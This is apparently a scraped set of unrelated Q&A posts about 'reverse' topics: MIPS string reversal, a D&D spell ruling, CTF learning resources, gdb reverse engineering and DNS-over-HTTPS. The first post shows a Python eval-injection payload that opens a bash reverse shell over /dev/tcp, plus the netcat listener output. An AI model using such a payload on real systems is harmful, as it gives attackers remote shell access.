Why reverse shell gives ambiguous redirect [closed]

I am exploiting python eval function. In target system code is like

eval('%s > 1' % My_Payload)

However, reverse shell is giving ambiguous redirect error. I am sending code like

"__import__('os').system('bash -i >& /dev/tcp/ 0>&1')"

nc -lvnp 8081 listening on [any] 8081 ... connect to [] from (UNKNOWN) [] 43478 -bash: 1)#")}: ambiguous redirect

It seems to me that system does not have /dev/tcp, but I am not sure.

Any help appreciated.

Reading in string and printing in reverse order MIPS architecture

.data string1: .space 5 str2: .asciiz “\n The output string is: ” string2: .space 5 str1: .asciiz “\n Enter the string: ” .text li $ v0, 4 la $ a0, str1 syscall

li $ v0, 8 #read in string li $ a1, 5 #the size is 4 la $ a0, string1 syscall #lw $ t7, 0($ a0) lb $ t0, 0($ a0) #1st letter lb $ t1, 1($ a0) #2nd letter lb $ t2, 2($ a0) #3rd letter lb $ t3, 3($ a0) #4th letter

addi $ sp, $ sp, -4 #allocate 4 bytes for the string sb $ t0, 0($ sp) #4th letter sb $ t1, 1($ sp) #3rd letter sb $ t2, 2($ sp) #2nd letter sb $ t3, 3($ sp) #1st letter

lb $ s0, 3($ sp) #4th letter lb $ s1, 2($ sp) #3rd letter lb $ s2, 1($ sp) #2nd letter lb $ s3, 0($ sp) #1st letter addi $ sp, $ sp, 4

sll $ s4, $ s0, 8 add $ s4, $ s4, $ s1 sll $ s4, $ s4, 8 add $ s4, $ s4, $ s2 sll $ s4, $ s4, 8 add $ s4, $ s4, $ s3

la $ t0, string2 #lw $ s4, 0($ t0)

li $ v0, 4 la $ a0, str2 syscall

li $ v0, 4 #la $ a0, string2 #prints what’s in string2 move $ a0, $ s0

li $ v0, 10 syscall

It’s giving me an error that the address is out of range. How do I print what’s in $ s4?

How are creatures that make Reverse Gravity’s save affected?

Reverse Gravity allows affected creatures to try not to fall:

This spell reverses gravity in a 50-foot-radius, 100- foot high cylinder centered on a point within range. All creatures and objects that aren’t somehow anchored to the ground in the area fall upward and reach the top of the area when you cast this spell. A creature can make a Dexterity saving throw to grab onto a fixed object it can reach, thus avoiding the fall.

It clearly defines what happens to creatures that fail the save:

If some solid object (such as a ceiling) is encountered in this fall, Falling Objects and creatures strike it just as they would during a normal downward fall. If an object or creature reaches the top of the area without striking anything, it remains there, oscillating slightly, for the Duration.

However it has no guidance for what happens to creatures that succeed it. They are left hanging from the floor, (which is relatively speaking the ceiling for them), and all we know from the spell is that they must be using at least one arm to maintain that state.

There are a few questions to resolve in ruling on this:

  1. Are they easier to hit? Maybe not – heavy armor is still good at deflecting missiles, and characters with light armor could be swaying and swinging to dodge.

  2. Can they keep hanging on indefinitely? Should they be making Strength saves or Athletics checks to hang on? Presumably it should be easier to hang from whatever they’re holding if they are holding on with 2 hands?

  3. (How) can they move? There are rules for climbing, but not climbing across a ceiling (which is what the floor is currently acting as), save some monsters’ Spider Climb ability. My guess would be that it would be an Acrobatics rather than Athletics check (swinging from handhold to handhold rather than pulling yourself up).

Reverse engineering and buffer overflows: zero to hero

When I do CTFs, I can usually cope well with and understanding everything pretty much apart from buffer overflows, binary exploitation and reverse engineering

Almost to the point that I would consider myself having zero knowledge at all. I grasp the concept at the very most basic of levels and by that I mean I can operate a mouse and keyboard

Is there anywhere that takes you from zero to hero? I’m currently doing CTFs on https://0x0539.net/ and have done most of them apart from reverse engineering ones.

https://liveoverflow.com/ is a decent start I believe but was wondering where there was a book, an online resource that as I say, could take me from zero to hero

I understand there’s a “stack” and “memory” and “assembly language” and then after that… nothing.

Specifically – I would like to get to a point where I come across a related challenge in a CTF and at least know where to start, where to go and how to complete it


Reverse Engineering a binary file

I have started reading into reverse engineering binary files and was hoping if someone could help me understand how to reverse engineer a file using gdb. I found this example Secret binary on the internet which I thought would be good start. I know basic functions to get all the function name and to disassemble but I could not solve it. It has a secret string hidden somewhere. Can someone help?

Can DNS-over-HTTPS be broken by reverse DNS lookups? [duplicate]

This question already has an answer here:

  • How does DoH protect against ISP tracking? 1 answer
  • Why use DNS over TLS/HTTPS if ISP could find out target domain by other means? 2 answers

If anyone can see the receiver IP address in a HTTPS request, what will stop ISPs from analysing the packet, reverse DNS lookup the IP and block the access to the domain the client is trying to reach. Is this possible and if yes how much would it slow down traffic?

This is a followup question to Will HTTPS expose the IP address of the receiver?